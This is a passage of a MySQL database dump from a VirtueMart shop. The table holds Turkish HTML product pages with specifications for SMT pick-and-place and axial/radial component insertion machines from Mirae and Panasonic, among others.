  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_product_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_products_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_products_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_products_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_products_tr_tr` VALUES (2,'Masaüstü SMD P&P - 3,000cph','<h2>LE40V&nbsp;Hassas Masa &Uuml;st&uuml; SMT Dizgi Makinesi</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"background-image: background-color: #ffffff; font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: left;\">\r\n<li>Orta/D&uuml;ş&uuml;k hacimli işletmeler i&ccedil;in gelişmiş teknolojili SMT dizgi sistemidir</li>\r\n<li>Cognex Vision sistemli kameralı malzeme hizalama ile hemen&nbsp;her tip&nbsp;malzemenin hassas dizgisi m&uuml;mk&uuml;nd&uuml;r</li>\r\n<li>Sınıfındaki en iyi grafik aray&uuml;z ile dakikalar i&ccedil;inde kolay programlama</li>\r\n<li>0201 chip malzemeden 15mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</li>\r\n<li>Kapalı &ccedil;evrim ile kontrol edilen hassas dizgi kafası</li>\r\n<li>96 adete kadar 8mm besleyici kapasitesi</li>\r\n<li>Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</li>\r\n<li>Kafa &uuml;zerinde kameralı, lazer veya mekanik hizalama</li>\r\n<li>Otomatik nozzle değiştirme&nbsp;</li>\r\n<li>Harici have bağlantısına ihtiya&ccedil; duymayan sistem</li>\r\n</ul>\r\n<p style=\"text-align: left;\"><img src=\"images/ddm/LE40V.JPG\" alt=\"\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: left;\" /></p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col /><col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>LE40V</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td>\r\n<p>343mm x 560mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td >\r\n<p>0201 chip - 35mm kare IC</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td>\r\n<p>&plusmn;0.025 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen IC Bacak Aralığı</p>\r\n</td>\r\n<td>0.381mm</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td>\r\n<p>3000 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Pratik Dizgi Hızı</p>\r\n</td>\r\n<td>\r\n<p>1800-2500 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Hareket Alanı</p>\r\n</td>\r\n<td>\r\n<p>560mm x 560mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td>\r\n<p>96 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td>\r\n<p>8, 12, 16, 24, 32, 44mm (Elektrikli)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Titreşim Besleyiciler</p>\r\n</td>\r\n<td>\r\n<p>D&ouml;kme, t&uuml;p, &ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td>\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Lazer Hizalama</p>\r\n</td>\r\n<td>\r\n<p>Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vision Sistemi</p>\r\n</td>\r\n<td>Cognex Vision</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dispenser Opsiyonu</p>\r\n</td>\r\n<td>10,000 nokta/saat</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>W 1016 mm x D 1067mm x H 635mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip &ndash; 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">T&uuml;p</li>\r\n<li style=\"text-align: left;\">D&ouml;kme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,&hellip;)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>','LE-40V','','','','le-40v'),(3,'MX200LP - IPC: 15,000cph','<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left; margin-left: 30px;\">MIRAE MX200LP SMD Dizgi Makinesi</p>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 15,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Pratik Hız: 9,000-12,500cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 680x460x5.0mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Lineer Enkoder (2um çözünürlüklü)</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Servo Motor</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.025mm tekrarlama doğruluğu</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8, 12, 16, 24, 32, 44, 56, 72, 88mm besleyiciler + Tepsi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Intelligent Feeders</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Windows tabanlı MMI</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"border-collapse: collapse; width: 633px; height: 279px; margin-left: 60px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col style=\"width: 236pt;\" width=\"394\" /> <col style=\"width: 412pt;\" width=\"686\" /> </colgroup>\r\n<tbody>\r\n<tr>\r\n<td width=\"394\" height=\"21\">\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>MX200LP</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>680mm x 460mm x 5mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>0201 chip - 35mm kare IC</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>±0.025 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>15,000 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Pratik Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>9,000 - 12,500 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>80 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>8, 12, 16, 24, 32, 44, 56, 72, 88mm (Elektrikli)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Titreşim Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Dökme, tüp, çubuk (Frekans ve güçayarlanabilir)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Lazer Hizalama</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Vision Sistemi</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Cognex Vision</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Boyutlar</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>W 2330 mm x D 1900mm x H 1500mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Malzemeler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip – 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">Tüp</li>\r\n<li style=\"text-align: left;\">Dökme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,…)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>','MX200LP','','','','mx200lp'),(4,'Max: 100,000cph / 8-104mm feeder / Tray Ünitesi','<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left; margin-left: 30px;\">PANASONIC SMD Dizgi Makinesi</p>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 100,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">3, 8 ve 12 kafa seçenekleri</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 510 x 460mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Servo Motor</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.035mm dizgi hassasiyeti</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm arası malzemelerin dizgisi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feederler + Tray Ünitesi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Gelişmiş MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modüler ve esnek</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Hızlı ürün dönüşümü</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"border-collapse: collapse; width: 633px; height: 279px; margin-left: 60px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col style=\"width: 236pt;\" width=\"394\" /><col style=\"width: 412pt;\" width=\"686\" /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td width=\"394\" height=\"21\">\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>CM-602-L</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>510 x 460mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>01005 chip - 100x90mm konnektör</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>±0.035 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>100,000cph (12 kafa) - 75,000cph (8 kafa)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>216 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>8 - 104mm feeder, bulk feeder, tray unit</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Boyutlar</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>W 2350mm x D 2290mm x H 1430mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Malzemeler\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','CM-602-L','','','','cm-602-l'),(5,'Aksiyel Dizgi','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic Yüksek Hızlı Aksiyel Bacaklı Malzeme Dizgi Makinesi</h2>\r\n<p style=\"text-align: left;\"> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/av132.jpg\" alt=\"\" width=\"400\" height=\"271\" /> </td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px;\">\r\n<ul style=\"font-size: 10px; text-align: start;\">\r\n<li><strong>Saatte 22,000 komponent dizgi hızı</strong></li>\r\n<li><strong>Otomatik koordinat düzeltme fonksiyonu ile güvenilir dizgi</strong></li>\r\n<li><strong>Dikey malzeme besleyiciler ile arttırılmış kapasite ve düşürülmüş ürün dönüşüm zamanı</strong></li>\r\n<li><strong>Azaltılmış çalışma maliyetleri</strong></li>\r\n<li><strong>Makinenin ön ve arka tarafları için bağımsız kontrol panelleri</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"> </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" border=\"1\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">AV132</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJ5A / 6A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 150mm x W 50mm -  L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">22,000 komponent / saat</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Sayısı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">60 + 60 + JW</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors 1/8 W, 1/6 W,1/4 W, ½ W, jumper wires (tin-plated), Diyodes, Cylindrical ceramic capacitors</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Malzeme Alış</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Sequencer Yöntemi</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Yönü</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">4 yön (0, 90, 180, -270)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Güç Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V  4 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 150 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 4050 mm x D 1900mm x H 1590mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2520kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>','AV132','','','','av132'),(66,'Radyal Dizgi','<h2>Panasonic Yüksek Hızlı Radyal Bacaklı Malzeme Dizgi Makinesi</h2>\r\n<p style=\"text-align: left;\"> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_rh2sb.gif\" alt=\"\" border=\"0\" /> </td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.25 saniye/malzeme hızıyla endüstrideki en iyi verimlilik</strong></li>\r\n<li><strong>2.5/5.0/7.5/10 mm bacak aralıklı radyal  malzemeleri dizebilme</strong></li>\r\n<li><strong>4 yönde dizgi (0, 90, -90, 180)</strong></li>\r\n<li><strong>Sabit malzeme feederları ve malzeme bitiş uyarısı ile duraksamasız üretim</strong></li>\r\n<li><strong>Otomatik recovery özelliği ile %100 dizgi oranı</strong></li>\r\n<li><strong>Windows XP tabanlı LCD dokunmatik ekran</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>  </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" border=\"1\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">RG131</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: 